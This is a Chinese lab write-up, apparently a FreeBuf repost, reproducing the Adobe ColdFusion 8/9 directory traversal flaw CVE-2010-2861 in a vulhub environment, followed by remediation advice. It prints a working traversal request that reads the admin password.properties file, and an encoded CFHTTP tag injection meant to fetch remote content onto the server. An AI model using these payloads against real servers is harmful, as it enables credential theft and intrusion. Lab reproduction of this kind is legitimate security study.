漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

漏洞复现

环境使用的kali +vulhub

cd vulhub/coldfusion/CVE-2010-2861
docker-compose up -d

http://172.17.0.1:8500/CFIDE/administrator/enter.cfm
you-ip初始化页面

输入admin后关闭了虚拟机：kali磁盘空间不足

没注意到D盘空间满了，删了不需要的，继续运行

输入admin

抓取到的数据包

抓到的数据包修改

GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1
Host: 172.17.0.1:8500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 0

成功

其他问题访问一个不存在的页面，注意编码问题，否则不成功的。

http://172.17.0.1:8500/%3CCFHTTP%20METHOD%3DGet%20URL%3D%23URL.u%23%20PATH%3D%23URL.p%23%20FILE%3D%23URL.f%23%3E.cfml

修复建议

配置文件：在配置文件中限制访问的文件目录，比如 PHP 中 php.ini 配置 open_basedir

特殊字符过滤：检查用户输入，过滤或转义含有“../”、“..\”、“%00”，“..”，“./”，“#”等跳转目录或字符终止符、截断字符的输入

合法性判断：严格过滤用户输入字符的合法性，比如文件类型、文件地址、文件内容等

白名单：白名单限定访问文件的路径、名称及后缀名

来自：FreeBuf.COM